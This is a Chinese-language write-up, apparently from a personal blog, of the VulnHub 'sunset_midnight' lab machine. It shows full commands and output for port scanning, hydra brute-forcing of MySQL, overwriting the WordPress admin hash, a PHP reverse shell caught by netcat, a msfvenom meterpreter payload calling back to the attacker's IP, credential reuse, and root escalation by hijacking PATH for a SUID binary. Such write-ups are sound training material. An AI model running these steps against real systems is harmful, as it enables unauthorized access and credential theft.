sunset_midnight 靶机

sunset_midnight 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.132
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 08:17 EDT
Nmap scan report for 192.168.56.132
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 08:00:27:91:BF:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds

开放了 22, 80, 3306 端口,先试试 MySQL 有没有无密码登录,之所以先尝试,是因为过去有过使用 nmap 扫描的时候,被封了 IP,重启之后才能 MySQL 无密码登录

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ mysql -uroot 192.168.56.132 
ERROR 2002 (HY000): Can\'t connect to local server through socket '/run/mysqld/mysqld.sock' (2)

┌──(kali㉿kali)-[~]
└─$ mysql -uroot 192.168.56.132 -p
Enter password: 
ERROR 2002 (HY000): Can\'t connect to local server through socket '/run/mysqld/mysqld.sock' (2)

搁置,先去看看别的信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.56.132          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 08:19 EDT
Nmap scan report for 192.168.56.132
Host is up (0.00033s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Did not follow redirect to http://sunset-midnight/
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolNew, FoundRows, DontAllowDatabaseTableColumn, Support41Auth, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, SupportsLoadDataLocal, LongColumnFlag, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: SmLrz0y6?xba?WvoGVZC
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:91:BF:42 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.48 seconds

汇总一下信息:Debian 操作系统,需要修改 hosts 文件,robots.txt 中有个目录 /wp-admin/,说明网站有 wordpress ,mysql-info 中有着 MySQL 的详细信息,猜测可能存在突破点。漏洞脚本扫描一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306 192.168.56.132          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 22:46 EDT
Nmap scan report for sunset-midnight (192.168.56.132)
Host is up (0.00026s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-wordpress-users: 
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-enum: 
|   /blog/: Blog
|   /wp-login.php: Possible admin folder
|   /wp-json: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 5.4.2
|   /feed/: Wordpress version: 5.4.2
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|_  /contact/: Potentially interesting folder
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:91:BF:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 48.21 seconds

结果中基本都是 wordpress 的常见目录,搜索一下 mysql-info 相关的信息找一找思路

也是一台靶机,里面提到了爆破的思路

MySQL 密码爆破

之前尝试空密码登录但是失败了,这里用 hydra 进行 MySQL 端口的密码爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.56.132 mysql
[sudo] password for kali: 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-02 09:25:00
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.56.132:3306/
[3306][mysql] host: 192.168.56.132   login: root   password: robert
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-02 09:25:14

数据库的用户名和密码爆破得到了 root:robert,登录进去,查看有没有感兴趣的东西

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~]
└─$ mysql -u root -h 192.168.56.132 -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 14
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+
4 rows in set (0.003 sec)

MariaDB [(none)]> use wordpress_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url               | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin         | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

发现了密码,尝试在线网站没结果,尝试 john 爆破五六分钟还是没结果就放弃了。那就先记录一下这个密码哈希值,然后我尝试了 UDF 提权的方法,但是写入失败,插件目录无法写入,尝试调用系统命令,但是调用的确实我本地 kali 的命令。

修改数据库中的 wordpress 用户密码

那就只能考虑更换数据库中的 wordpress 用户密码,搜索找到了一个在线生成 wordpress 密码的网站

在线 生成wordpress密码、wordpress密码在线生成–查错网 (chacuo.net)

将结果复制下来,写入到数据库中

1
2
3
4
5
6
7
8
9
10
11
MariaDB [wordpress_db]> update wp_users SET user_pass='$P$BxmtX6aP2R/qqkrwLmnN7qnjJ5z6Jg1' where user_login='admin'; 
Query OK, 1 row affected (0.004 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url               | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BxmtX6aP2R/qqkrwLmnN7qnjJ5z6Jg1 | admin         | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

wordpress 后台 getshell

使用 admin:123456 登录 wordpress 成功

接下来就是常见思路了,修改主题的 404.php 文件,但是 update 的时候遇到了报错

1
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

之后我尝试了上传 php 文件、将 php 文件压缩后上传到插件、将包含 php 文件的目录压缩后上传到主题,但是由于 wordpress 版本较高,都遇到了各种问题而没有成功。

将报错信息谷歌一下,在第一个链接中找到了可能的解决办法

php - WordPress Editor not updating files: Unable to communicate back with site to check for fatal errors - Stack Overflow

尝试安装插件 https://wordpress.org/plugins/theme-editor/#installation 安装后修改 404.php 成功

开启监听后访问链接 http://sunset-midnight/wp-content/themes/twentyseventeen/404.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ sudo nc -lvnp 443             
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.132] 44338
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 23:38:47 up 43 min,  0 users,  load average: 0.00, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:91:bf:42 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.132/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 421sec preferred_lft 421sec
    inet6 fe80::a00:27ff:fe91:bf42/64 scope link 
       valid_lft forever preferred_lft forever
$ uname -a
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@midnight:/$

提权

反弹 shell 成功,接下来去网站根目录看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
www-data@midnight:/var/www/html$ ls -liah
ls -liah
total 12K
  7643 drwxr-xr-x 3 root     root     4.0K Jul 16  2020 .
  7642 drwxr-xr-x 3 root     root     4.0K Jul 16  2020 ..
272451 drwxr-x--- 5 www-data www-data 4.0K Aug  2 23:17 wordpress
www-data@midnight:/var/www/html$ cd wordpress
cd wordpress
www-data@midnight:/var/www/html/wordpress$ ls -alih
ls -alih
total 220K
272451 drwxr-x---  5 www-data www-data 4.0K Aug  2 23:17 .
  7643 drwxr-xr-x  3 root     root     4.0K Jul 16  2020 ..
272450 -rw-r--r--  1 www-data www-data  461 Jul 16  2020 .htaccess
273192 -rw-r-----  1 www-data www-data  499 Jul 18  2020 index.php
273197 -rw-r-----  1 www-data www-data  20K Feb 12  2020 license.txt
273190 -rw-r-----  1 www-data www-data 7.2K Jan 10  2020 readme.html
274695 -rw-r-----  1 www-data www-data 6.8K Feb  6  2020 wp-activate.php
278726 drwxr-x---  9 www-data www-data 4.0K Jun 10  2020 wp-admin
273189 -rw-r-----  1 www-data www-data  351 Feb  6  2020 wp-blog-header.php
275241 -rw-r-----  1 www-data www-data 2.3K Jun  2  2020 wp-comments-post.php
273194 -rw-r-----  1 www-data www-data 3.2K Jul 18  2020 wp-config.php
278538 drwxr-x---  6 www-data www-data 4.0K Aug  2 23:35 wp-content
273193 -rw-r-----  1 www-data www-data 3.9K Feb  6  2020 wp-cron.php
278594 drwxr-x--- 21 www-data www-data  12K Jun 10  2020 wp-includes
273587 -rw-r-----  1 www-data www-data 2.5K Feb  6  2020 wp-links-opml.php
273588 -rw-r-----  1 www-data www-data 3.3K Feb  6  2020 wp-load.php
273195 -rw-r-----  1 www-data www-data  47K Feb  9  2020 wp-login.php
273586 -rw-r-----  1 www-data www-data 8.4K Apr 14  2020 wp-mail.php
273196 -rw-r-----  1 www-data www-data  19K Apr  9  2020 wp-settings.php
273191 -rw-r-----  1 www-data www-data  31K Feb  6  2020 wp-signup.php
275240 -rw-r-----  1 www-data www-data 4.7K Feb  6  2020 wp-trackback.php
273186 -rw-r-----  1 www-data www-data 3.1K Feb  6  2020 xmlrpc.php

横向移动

查看 wp-config.php 文件得到数据库用户 jose 的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'jose' );

/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

看一眼 home 目录中包含了 jose 用户,那就尝试数据库用户的密码是否与 jose 的密码重用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@midnight:/var/www/html/wordpress$ su jose
su jose
Password: 645dc5a8871d2a4269d4cbe23f6ae103

jose@midnight:/var/www/html/wordpress$ whoami
whoami
jose
jose@midnight:/var/www/html/wordpress$ id
id
uid=1000(jose) gid=1000(jose) groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
jose@midnight:/var/www/html/wordpress$ uname -a
uname -a
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
jose@midnight:/var/www/html/wordpress$ sudo -l
sudo -l
[sudo] password for jose: 645dc5a8871d2a4269d4cbe23f6ae103

Sorry, user jose may not run sudo on midnight.

交互性差点意思,不过开放了 22 端口尝试 ssh 登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ ssh jose@192.168.56.132                                           
jose@192.168.56.132\'s password: 
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul 18 15:33:29 2020 from 192.168.100.139
jose@midnight:~$ id
uid=1000(jose) gid=1000(jose) groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

看一看定时任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
jose@midnight:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

没有收获,家目录中看一看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
jose@midnight:/var/www/html/wordpress$ cd ~
cd ~
jose@midnight:~$ ls -laih
ls -laih
total 28K
272437 drwxr-xr-x 3 jose jose 4.0K Jul 18  2020 .
262151 drwxr-xr-x 3 root root 4.0K Jul 16  2020 ..
273166 lrwxrwxrwx 1 root root    9 Jul 16  2020 .bash_history -> /dev/null
272439 -rw-r--r-- 1 jose jose  220 Jul 16  2020 .bash_logout
272440 -rw-r--r-- 1 jose jose 3.5K Jul 16  2020 .bashrc
278755 drwxr-xr-x 3 jose jose 4.0K Jul 16  2020 .local
273181 lrwxrwxrwx 1 root root    9 Jul 16  2020 .mysql_history -> /dev/null
272438 -rw-r--r-- 1 jose jose  807 Jul 16  2020 .profile
272059 -rw------- 1 jose jose   33 Jul 16  2020 user.txt
jose@midnight:~$ cat user.txt
cat user.txt
956a9564aa5632edca7b745c696f6575

先拿到了 user 的 flag

接下来寻找提权的思路,看一看 SUID 权限文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
jose@midnight:/tmp$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
   134749     64 -rwsr-xr-x   1 root     root        63568 Jan 10  2019 /usr/bin/su
   152548    156 -rwsr-xr-x   1 root     root       157192 Feb  2  2020 /usr/bin/sudo
   275266     20 -rwsr-sr-x   1 root     root        16768 Jul 18  2020 /usr/bin/status
   131131     56 -rwsr-xr-x   1 root     root        54096 Jul 27  2018 /usr/bin/chfn
   131136     64 -rwsr-xr-x   1 root     root        63736 Jul 27  2018 /usr/bin/passwd
   131132     44 -rwsr-xr-x   1 root     root        44528 Jul 27  2018 /usr/bin/chsh
   135085     36 -rwsr-xr-x   1 root     root        34888 Jan 10  2019 /usr/bin/umount
   134602     44 -rwsr-xr-x   1 root     root        44440 Jul 27  2018 /usr/bin/newgrp
   135083     52 -rwsr-xr-x   1 root     root        51280 Jan 10  2019 /usr/bin/mount
   131134     84 -rwsr-xr-x   1 root     root        84016 Jul 27  2018 /usr/bin/gpasswd
   268427     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   143469     52 -rwsr-xr--   1 root     messagebus    51184 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   146860    428 -rwsr-xr-x   1 root     root         436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign

有个文件看着生疏 /usr/bin/status,尝试运行一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
jose@midnight:/tmp$ /usr/bin/status
/usr/bin/status
● ssh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2023-08-02 22:55:33 EDT; 50min ago
     Docs: man:sshd(8)
           man:sshd_config(5)
  Process: 410 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
 Main PID: 452 (sshd)
    Tasks: 1 (limit: 1150)
   Memory: 3.6M
   CGroup: /system.slice/ssh.service
           └─452 /usr/sbin/sshd -D

Aug 02 22:55:33 midnight systemd[1]: Starting OpenBSD Secure Shell server...
Aug 02 22:55:33 midnight sshd[452]: Server listening on 0.0.0.0 port 22.
Aug 02 22:55:33 midnight sshd[452]: Server listening on :: port 22.
Aug 02 22:55:33 midnight systemd[1]: Started OpenBSD Secure Shell server.

是服务信息的检查,看看其中有什么可读字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
jose@midnight:~$ strings /usr/bin/status
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Status of the SSH server:
service ssh status
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
status.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

看到了这样一个命令 service ssh status,而且使用的是相对路径,那就尝试 SUID 环境变量利用提权

SUID 环境变量利用提权

这里专门去翻了一下红队笔记文档,因为自己构建的反弹 shell 的程序,反弹成功后没有回显

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f elf >shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes


┌──(kali㉿kali)-[~/Downloads/sunset_midnight]
└─$ sudo nc -lvnp 4444           
[sudo] password for kali: 
listening on [any] 4444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.132] 51694
whoami
id
pwd
?
^C

首先把当前路径加入到环境变量的最前面

1
2
3
ose@midnight:/tmp$ export PATH=.:$PATH
jose@midnight:/tmp$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

然后构造一个 c 源代码文件再编译

1
2
3
4
5
6
7
#include<stdio.h>                                                      
#include<stdlib.h>                                                     
void main(){                                                                                                        
        setgid(0);
        setuid(0);
        system("/bin/bash -p");
}

编辑、编译

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
jose@midnight:/tmp$ vim service.c
-bash: vim: command not found
jose@midnight:/tmp$ vi service.c
jose@midnight:/tmp$ gcc service.c -o service
service.c: In function ‘main’:
service.c:5:2: warning: implicit declaration of function ‘setgid’; did you mean ‘setenv’? [-Wimplicit-function-declaration]
  setgid(0);
  ^~~~~~
  setenv
service.c:6:2: warning: implicit declaration of function ‘setuid’; did you mean ‘setenv’? [-Wimplicit-function-declaration]
  setuid(0);
  ^~~~~~
  setenv
jose@midnight:/tmp$ ls
service    systemd-private-2e417010f87c4bc78758e4440be734b2-apache2.service-T1TnPZ
service.c  systemd-private-2e417010f87c4bc78758e4440be734b2-systemd-timesyncd.service-e80keR

虽然有 warning 但还是得到了可执行文件,执行 status 文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
jose@midnight:/tmp$ /usr/bin/status
root@midnight:/tmp# whoami
root
root@midnight:/tmp# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose)
root@midnight:/tmp# cd /root
root@midnight:/root# ls -laih
total 52K
262153 drwx------  4 root root 4.0K Jul 18  2020 .
     2 drwxr-xr-x 18 root root 4.0K Jul 16  2020 ..
273162 lrwxrwxrwx  1 root root    9 Jul 16  2020 .bash_history -> /dev/null
262359 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
272012 drwxr-xr-x  3 root root 4.0K Jul 16  2020 .local
273172 lrwxrwxrwx  1 root root    9 Jul 16  2020 .mysql_history -> /dev/null
262358 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
272441 -rw-r--r--  1 root root  500 Jul 16  2020 root.txt
278753 drwx------  2 root root 4.0K Jul 18  2020 .ssh
275269 -rwsr-xr-x  1 root root  17K Jul 18  2020 status
272457 -rw-r--r--  1 root root  139 Jul 18  2020 status.c
root@midnight:/root# cat root.txt
          ___   ____
        /' --;^/ ,-_\     \ | /
       / / --o\ o-\ \\   --(_)--
      /-/-/|o|-|\-\\|\\   / | \
       '`  ` |-|   `` '
             |-|
             |-|O
             |-(\,__
          ...|-|\--,\_....
      ,;;;;;;;;;;;;;;;;;;;;;;;;,.
~,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,  ______   ---------   _____     ------

db2def9d4ddcb83902b884de39d426e6

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

提权成功

补充

在看别人的 WP 的时候发现他们执行的是如下命令

1
2
3
4
5
cd /tmp
echo "/bin/sh" > service
chmod +x service
export PATH=/tmp/:$PATH
/usr/bin/status

查了下为什么文件内容中只有 /bin/sh 还能够被识别然后执行:

knowledge_database > vulnhub
sunset_midnight 靶机
https://i3eg1nner.github.io/2023/08/7478c51012fb.html
作者
I3eg1nner
发布于
2023年8月2日
许可协议